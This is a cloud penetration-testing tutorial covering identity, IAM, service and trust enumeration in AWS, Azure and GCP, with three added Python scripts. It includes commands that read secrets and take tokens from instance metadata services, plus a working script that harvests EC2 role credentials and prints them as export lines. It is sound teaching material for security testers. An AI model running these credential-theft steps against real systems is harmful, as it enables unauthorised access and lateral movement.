Cloud Pentesting & Assessment
Cloud Enumeration & Reconnaissance
Effective cloud reconnaissance identifies attack paths before exploitation. Knowing how to enumerate cloud services, discover misconfigurations, and map trust relationships is fundamental to cloud security testing. Unless a section says otherwise, every command below runs with credentials already obtained for the target tenant, and every API call it makes is recorded by the provider's audit log (CloudTrail, Azure Activity Log, Cloud Audit Logs), so enumeration is noisy by design and a defender who is looking will see it.
AWS Enumeration
Identity Discovery
# Get current identity (needs no IAM permissions at all, but is always logged to CloudTrail)
aws sts get-caller-identity
# Output:
# {
# "UserId": "AIDAEXAMPLE123456789",
# "Account": "123456789012",
# "Arn": "arn:aws:iam::123456789012:user/compromised-user"
# }
# Get account aliases
aws iam list-account-aliases
IAM Enumeration
# List all users
aws iam list-users
# Get user details
aws iam get-user --user-name target-user
# List user policies (inline)
aws iam list-user-policies --user-name target-user
# List attached policies (managed)
aws iam list-attached-user-policies --user-name target-user
# Get policy details. v1 is only the first version ever created; the version
# in force is Policy.DefaultVersionId from `aws iam get-policy`, so read that first
aws iam get-policy-version \
--policy-arn arn:aws:iam::123456789012:policy/CustomPolicy \
--version-id v1
# List roles and trust policies (AssumeRolePolicyDocument is returned by both calls)
aws iam list-roles
aws iam get-role --role-name interesting-role
Service Enumeration
# EC2 instances (the instance profile ARN tells you which role an instance can mint credentials for via IMDS)
aws ec2 describe-instances \
--query 'Reservations[*].Instances[*].[InstanceId,State.Name,PublicIpAddress,IamInstanceProfile.Arn]'
# Lambda functions
aws lambda list-functions
aws lambda get-function --function-name target-function
aws lambda get-policy --function-name target-function # Resource policy
# S3 buckets
aws s3 ls
aws s3 ls s3://bucket-name --recursive
# RDS databases
aws rds describe-db-instances
# Secrets Manager
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id secret-name
# Parameter Store
aws ssm describe-parameters
aws ssm get-parameter --name /path/to/secret --with-decryption
Network Discovery
# VPCs
aws ec2 describe-vpcs
# Security groups
aws ec2 describe-security-groups \
--query 'SecurityGroups[*].[GroupId,GroupName,IpPermissions]'
# Find publicly accessible resources
aws ec2 describe-instances \
--filters "Name=instance-state-name,Values=running" \
--query 'Reservations[*].Instances[?PublicIpAddress!=`null`].[InstanceId,PublicIpAddress]'
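The `describe-instances` and `describe-security-groups` calls above are most useful when correlated: an instance is only internet-reachable if it is running, has a public address, and one of its security groups allows ingress from `0.0.0.0/0` or `::/0`. The following script does that join over saved `--output json` files. It is an added example, not code from the original page; the two JSON samples are constructed to mimic the CLI output, and the function names (`open_rules`, `world_reachable`) are mine.

```python
"""Correlate `aws ec2 describe-instances --output json` with
`aws ec2 describe-security-groups --output json` to list instances that are
reachable from the internet and which instance-profile role each one carries.

Added example for this page, not from the original article. INSTANCES_JSON and
SGS_JSON are constructed samples; pass json.load()ed real output instead.
"""
import json

WORLD = {"0.0.0.0/0", "::/0"}   # CIDRs that mean "anyone on the internet"

# Constructed sample: four instances, three security groups.
INSTANCES_JSON = """
{"Reservations": [{"Instances": [
  {"InstanceId": "i-0aaa", "State": {"Name": "running"}, "PublicIpAddress": "203.0.113.10",
   "SecurityGroups": [{"GroupId": "sg-web"}],
   "IamInstanceProfile": {"Arn": "arn:aws:iam::123456789012:instance-profile/web-role"}},
  {"InstanceId": "i-0bbb", "State": {"Name": "running"},
   "SecurityGroups": [{"GroupId": "sg-web"}]},
  {"InstanceId": "i-0ccc", "State": {"Name": "stopped"}, "PublicIpAddress": "203.0.113.11",
   "SecurityGroups": [{"GroupId": "sg-admin"}]},
  {"InstanceId": "i-0ddd", "State": {"Name": "running"}, "PublicIpAddress": "203.0.113.12",
   "SecurityGroups": [{"GroupId": "sg-internal"}]}
]}]}
"""
SGS_JSON = """
{"SecurityGroups": [
  {"GroupId": "sg-web", "GroupName": "web", "IpPermissions": [
     {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
      "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": [], "UserIdGroupPairs": []},
     {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
      "IpRanges": [{"CidrIp": "10.0.0.0/8"}], "Ipv6Ranges": [{"CidrIpv6": "::/0"}], "UserIdGroupPairs": []}]},
  {"GroupId": "sg-admin", "GroupName": "admin", "IpPermissions": [
     {"IpProtocol": "-1", "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": [], "UserIdGroupPairs": []}]},
  {"GroupId": "sg-internal", "GroupName": "internal", "IpPermissions": [
     {"IpProtocol": "tcp", "FromPort": 0, "ToPort": 65535,
      "IpRanges": [], "Ipv6Ranges": [], "UserIdGroupPairs": [{"GroupId": "sg-web"}]}]}
]}
"""
INSTANCES = json.loads(INSTANCES_JSON)
SGS = json.loads(SGS_JSON)


def open_rules(security_groups):
    """Map GroupId -> [(proto, from_port, to_port, cidr)] for rules open to the world.
    Rules whose only source is another security group (UserIdGroupPairs) are not
    world-open and are ignored."""
    result = {}
    for sg in security_groups["SecurityGroups"]:
        rules = []
        for perm in sg.get("IpPermissions", []):
            proto = perm["IpProtocol"]                       # "-1" = all protocols, no port keys
            lo = perm.get("FromPort", 0 if proto == "-1" else None)
            hi = perm.get("ToPort", 65535 if proto == "-1" else None)
            cidrs = [r["CidrIp"] for r in perm.get("IpRanges", [])]
            cidrs += [r["CidrIpv6"] for r in perm.get("Ipv6Ranges", [])]
            rules += [(proto, lo, hi, c) for c in cidrs if c in WORLD]
        result[sg["GroupId"]] = rules
    return result


def world_reachable(instances, security_groups):
    """Running instances with a public IP and at least one world-open rule.
    Returns (InstanceId, PublicIp, proto, from, to, cidr, instance_profile_arn)
    tuples sorted by instance and port."""
    rules_by_sg = open_rules(security_groups)
    hits = []
    for res in instances["Reservations"]:
        for inst in res["Instances"]:
            ip = inst.get("PublicIpAddress")
            if not ip or inst["State"]["Name"] != "running":
                continue                                     # not reachable right now
            profile = (inst.get("IamInstanceProfile") or {}).get("Arn")
            for sg in inst.get("SecurityGroups", []):
                for proto, lo, hi, cidr in rules_by_sg.get(sg["GroupId"], []):
                    hits.append((inst["InstanceId"], ip, proto, lo, hi, cidr, profile))
    return sorted(hits, key=lambda h: (h[0], h[3] or 0))


if __name__ == "__main__":
    for hit in world_reachable(INSTANCES, SGS):
        print(hit)
```

On the sample data only `i-0aaa` is reported (443 from anywhere over IPv4, 22 from anywhere over IPv6 even though the IPv4 rule is restricted to 10.0.0.0/8). The stopped instance and the one without a public address are skipped, and `sg-internal` is not flagged because its only source is another group. Note that this check does not consider network ACLs or whether the instance is actually listening.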
Azure Enumeration
Authentication and Context
# Current user context
az account show
az ad signed-in-user show
# List accessible subscriptions
az account list
# Switch subscription
az account set --subscription "subscription-name"
Resource Enumeration
# List all resources in subscription
az resource list --output table
# Virtual machines
az vm list --output table
az vm show --name vm-name --resource-group rg-name
# Storage accounts
az storage account list
az storage container list --account-name storage-account
# Key Vaults (listing vaults needs only RBAC on the resource; reading secrets needs a
# data-plane grant as well: an access policy or the Key Vault Secrets User role)
az keyvault list
az keyvault secret list --vault-name vault-name
# App Services
az webapp list
az webapp config appsettings list --name app-name --resource-group rg-name
Azure AD (Microsoft Entra ID) Enumeration
# Users
az ad user list --query "[].{UPN:userPrincipalName,DisplayName:displayName}"
# Groups
az ad group list
az ad group member list --group "group-name"
# Service principals
az ad sp list --all
# App registrations
az ad app list --all
# Role assignments
az role assignment list --all
GCP Enumeration
Authentication Context
# Current configuration
gcloud config list
# Active account
gcloud auth list
# Project information
gcloud projects describe PROJECT_ID
Service Enumeration
# Compute instances
gcloud compute instances list
# Cloud Storage
gsutil ls
gsutil ls gs://bucket-name
# Cloud Functions
gcloud functions list
gcloud functions describe function-name
# Cloud Run
gcloud run services list
# Secret Manager
gcloud secrets list
gcloud secrets versions access latest --secret="secret-name"
# IAM policies
gcloud projects get-iam-policy PROJECT_ID
gcloud iam service-accounts list
Unauthenticated Enumeration
Public Storage Discovery
# S3 - Anonymous access
aws s3 ls s3://company-bucket --no-sign-request
# Azure Blob - Public container. The storage account name is the hostname; a container
# with "Container" public access level allows listing, "Blob" level only allows fetching blobs whose names you already know
curl "https://storageaccount.blob.core.windows.net/container?restype=container&comp=list"
# GCP - Public bucket (allUsers or allAuthenticatedUsers binding). gsutil reuses any
# active gcloud credentials, so to confirm truly anonymous access query the JSON API
# with no credentials: https://storage.googleapis.com/storage/v1/b/company-bucket/o
gsutil ls gs://company-bucket
# Automated tools
# cloud_enum - multi-cloud enumeration
python3 cloud_enum.py -k company-name
# S3Scanner
s3scanner scan --bucket-file buckets.txt
Metadata Service Exploitation
AWS EC2 metadata (from a compromised instance, or through an SSRF that reaches 169.254.169.254):
# IMDSv1 (only when the instance has HttpTokens=optional)
curl http://169.254.169.254/latest/meta-data/
# role-name comes from the listing at .../iam/security-credentials/ (same path with no name appended)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name
# IMDSv2 (token required). The PUT with a custom header is exactly what most SSRF
# primitives cannot send, and the token response is dropped beyond the instance's
# hop limit (default 1), so a container on a bridge network may not receive one
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name
Azure IMDS (the Metadata header is mandatory; change resource= to https://vault.azure.net or https://storage.azure.com to get tokens for those services instead of ARM):
curl -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
curl -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
GCP metadata:
curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/"
curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
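The IMDSv1/IMDSv2 distinction above matters in practice: a harvester that assumes v1 fails on instances with `HttpTokens=required`, and one that assumes v2 fails when the PUT cannot get through (hop limit, proxy, or a GET-only SSRF). The script below is an added example, not code from the original page: it tries the v2 token first, falls back to v1 only if no token was issued, discovers the role name from the listing instead of guessing it, and then fetches the credentials. Only `imds_credentials()` with the default transport talks to a real instance; `FakeIMDS` is a constructed stand-in so the logic can be exercised offline, and all function and class names are mine.

```python
"""Fetch the instance role's temporary credentials from EC2 IMDS, preferring
IMDSv2 and falling back to IMDSv1 only when no session token can be obtained.

Added example for this page, not from the original article. The real transport
only works where 169.254.169.254 is routable (i.e. on the EC2 instance itself);
FakeIMDS is a constructed stand-in for offline testing.
"""
import json
import urllib.error
import urllib.request

IMDS = "http://169.254.169.254"
TOKEN_PATH = "/latest/api/token"
CREDS_PATH = "/latest/meta-data/iam/security-credentials/"


def http(method, url, headers, timeout=2.0):
    """Real transport: (status, body). Errors and non-2xx become (status or 0, "")."""
    req = urllib.request.Request(url, method=method, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as e:
        return e.code, ""
    except (urllib.error.URLError, OSError):
        return 0, ""


def imds_credentials(transport=http):
    """Return (imds_version_used, role_name, credentials_dict) or raise RuntimeError."""
    # 1. Try for an IMDSv2 session token. This is a PUT with a custom header; if the
    #    instance hop limit or a proxy swallows it we get no token and go on with v1.
    status, token = transport("PUT", IMDS + TOKEN_PATH,
                              {"X-aws-ec2-metadata-token-ttl-seconds": "21600"})
    headers = {"X-aws-ec2-metadata-token": token} if status == 200 and token else {}
    version = "IMDSv2" if headers else "IMDSv1"

    # 2. The listing names the attached role; never guess it.
    status, body = transport("GET", IMDS + CREDS_PATH, headers)
    if status != 200 or not body.strip():
        raise RuntimeError(f"{version}: no role attached or metadata blocked (HTTP {status})")
    role = body.strip().splitlines()[0]

    # 3. Fetch that role's temporary credentials (valid until "Expiration").
    status, body = transport("GET", IMDS + CREDS_PATH + role, headers)
    if status != 200:
        raise RuntimeError(f"{version}: credential fetch failed (HTTP {status})")
    return version, role, json.loads(body)


def export_env(creds):
    """Format credentials as the environment lines the AWS CLI reads."""
    return "\n".join([
        f"export AWS_ACCESS_KEY_ID={creds['AccessKeyId']}",
        f"export AWS_SECRET_ACCESS_KEY={creds['SecretAccessKey']}",
        f"export AWS_SESSION_TOKEN={creds['Token']}",
    ])


class FakeIMDS:
    """Constructed stand-in for the metadata service (not real IMDS behaviour in
    every detail). mode="required": HttpTokens=required, GETs without the token
    get 401. mode="v1": the PUT never arrives (hop limit / proxy) but GETs work."""

    def __init__(self, mode):
        self.mode = mode
        self.creds = {"AccessKeyId": "ASIAEXAMPLE", "SecretAccessKey": "secret",
                      "Token": "session", "Expiration": "2030-01-01T00:00:00Z"}

    def __call__(self, method, url, headers):
        if method == "PUT" and url.endswith(TOKEN_PATH):
            return (0, "") if self.mode == "v1" else (200, "fake-token")
        if self.mode == "required" and headers.get("X-aws-ec2-metadata-token") != "fake-token":
            return 401, ""
        if url.endswith(CREDS_PATH):
            return 200, "web-role\n"
        if url.endswith(CREDS_PATH + "web-role"):
            return 200, json.dumps(self.creds)
        return 404, ""


if __name__ == "__main__":
    version, role, creds = imds_credentials()        # real IMDS: run this on the instance
    print(version, role)
    print(export_env(creds))
```

The same v2-then-v1 ordering is what the AWS SDKs themselves use. When you only have a GET-based SSRF, the v2 branch is unavailable by construction, which is precisely why `HttpTokens=required` is the recommended hardening.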
Trust Relationship Mapping
Cross-Account Trust (AWS)
# Find roles trusting external accounts. Quick check only: it inspects Statement[0]
# and a string-valued Principal.AWS, so list-valued principals, "*", Federated and
# Service principals and later statements are all missed. Treat a hit as a lead, not a finding
aws iam list-roles --query 'Roles[?contains(AssumeRolePolicyDocument.Statement[0].Principal.AWS, `arn:aws:iam::`) && !contains(AssumeRolePolicyDocument.Statement[0].Principal.AWS, `'"$(aws sts get-caller-identity --query Account --output text)"'`)]'
# Analyze specific role trust
aws iam get-role --role-name CrossAccountRole \
--query 'Role.AssumeRolePolicyDocument'
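A trust policy can take several shapes that a JMESPath one-liner does not cover: `Statement` may be a single object rather than a list, `Principal` may be `"*"`, a bare 12-digit account ID, a list of ARNs, or a map with `AWS`, `Federated` and `Service` keys, and an external-account trust without an `sts:ExternalId` condition is the confused-deputy case worth calling out. The classifier below, an added example rather than code from the original page, walks the full `aws iam list-roles --output json` output and tags each role that can be assumed from outside the account. `ROLES_JSON` is constructed sample data and the function names are mine.

```python
"""Classify IAM role trust policies from `aws iam list-roles --output json`:
which roles are assumable from another account, from an identity provider,
or from anyone, and whether cross-account trusts require an ExternalId.

Added example for this page, not from the original article. ROLES_JSON is a
constructed sample; load the real output and pass it to classify_roles().
"""
import json
import re

OWN_ACCOUNT = "123456789012"   # value of Account from `aws sts get-caller-identity`

ROLES_JSON = """
{"Roles": [
 {"RoleName": "AppRole", "AssumeRolePolicyDocument": {"Version": "2012-10-17",
   "Statement": {"Effect": "Allow", "Principal": {"Service": "lambda.amazonaws.com"},
                 "Action": "sts:AssumeRole"}}},
 {"RoleName": "VendorAccess", "AssumeRolePolicyDocument": {"Version": "2012-10-17",
   "Statement": [{"Effect": "Allow",
                  "Principal": {"AWS": ["arn:aws:iam::123456789012:root",
                                        "arn:aws:iam::999999999999:role/VendorScanner"]},
                  "Action": "sts:AssumeRole",
                  "Condition": {"StringEquals": {"sts:ExternalId": "vendor-42"}}}]}},
 {"RoleName": "LegacyRole", "AssumeRolePolicyDocument": {"Version": "2012-10-17",
   "Statement": [{"Effect": "Allow", "Principal": {"AWS": "555555555555"},
                  "Action": "sts:AssumeRole"}]}},
 {"RoleName": "OpenRole", "AssumeRolePolicyDocument": {"Version": "2012-10-17",
   "Statement": [{"Effect": "Allow", "Principal": "*", "Action": "sts:AssumeRole"}]}},
 {"RoleName": "OIDCRole", "AssumeRolePolicyDocument": {"Version": "2012-10-17",
   "Statement": [{"Effect": "Allow",
                  "Principal": {"Federated": "arn:aws:iam::123456789012:oidc-provider/token.actions.githubusercontent.com"},
                  "Action": "sts:AssumeRoleWithWebIdentity",
                  "Condition": {"StringLike": {"token.actions.githubusercontent.com:sub": "repo:example-org/*"}}}]}}
]}
"""
ROLES = json.loads(ROLES_JSON)

# Bare account ID, or an IAM/STS ARN whose account field we want.
ACCOUNT_RE = re.compile(r"^(?:arn:aws:(?:iam|sts)::)?(\d{12})(?::.*)?$")


def as_list(x):
    """IAM allows a scalar anywhere it allows a list; normalise to list."""
    return x if isinstance(x, list) else [x]


def principal_entries(principal):
    """Flatten a Principal element into (kind, value) pairs; "*" becomes ("*", "*")."""
    if principal == "*":
        return [("*", "*")]
    out = []
    for kind, vals in principal.items():        # AWS / Federated / Service / CanonicalUser
        out += [(kind, v) for v in as_list(vals)]
    return out


def classify_roles(roles, own_account=OWN_ACCOUNT):
    """Return {RoleName: [tags]} for roles assumable from outside own_account.
    Tags: 'public' or 'public:conditioned' for "*", 'external:<acct>' plus
    ':no-external-id' when no sts:ExternalId condition is present, and
    'federated:<provider>'. Roles trusted only by own_account or by AWS
    services do not appear."""
    findings = {}
    for role in roles["Roles"]:
        doc = role["AssumeRolePolicyDocument"]
        for st in as_list(doc.get("Statement", [])):
            if st.get("Effect") != "Allow":
                continue                        # Deny statements cannot grant assumption
            cond = json.dumps(st.get("Condition", {}))
            for kind, value in principal_entries(st.get("Principal", {})):
                tag = None
                if kind == "*" or (kind == "AWS" and value == "*"):
                    tag = "public:conditioned" if st.get("Condition") else "public"
                elif kind == "AWS":
                    m = ACCOUNT_RE.match(value)
                    acct = m.group(1) if m else None
                    if acct and acct != own_account:
                        tag = f"external:{acct}"
                        if "sts:ExternalId" not in cond:
                            tag += ":no-external-id"
                elif kind == "Federated":
                    tag = f"federated:{value.rsplit('/', 1)[-1]}"
                if tag:
                    findings.setdefault(role["RoleName"], []).append(tag)
    return findings


if __name__ == "__main__":
    for name, tags in classify_roles(ROLES).items():
        print(f"{name:14} {', '.join(tags)}")
```

On the sample, `AppRole` (service-only trust) is silent, `VendorAccess` is an external trust with an ExternalId, `LegacyRole` is an external trust without one, `OpenRole` is assumable by anyone, and `OIDCRole` is reported as federated so you can go and read its `sub` condition. A `public:conditioned` tag usually means an `aws:PrincipalOrgID` or similar condition and deserves a manual look rather than an automatic pass.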
Service-Linked Relationships
# Find Lambda execution roles
aws lambda list-functions \
--query 'Functions[*].[FunctionName,Role]'
# EC2 instance profiles
aws ec2 describe-instances \
--query 'Reservations[*].Instances[*].[InstanceId,IamInstanceProfile.Arn]'
Enumeration Quick Reference
| Cloud | Identity | Resources | Secrets |
|---|---|---|---|
| AWS | `aws sts get-caller-identity` | `aws ec2/s3/lambda` describe/list | `aws secretsmanager`, `aws ssm` |
| Azure | `az account show` | `az resource list` | `az keyvault` |
| GCP | `gcloud config list` | `gcloud compute`, `gsutil` (storage) | `gcloud secrets` |
Next, we'll explore exploitation techniques and privilege escalation in cloud environments.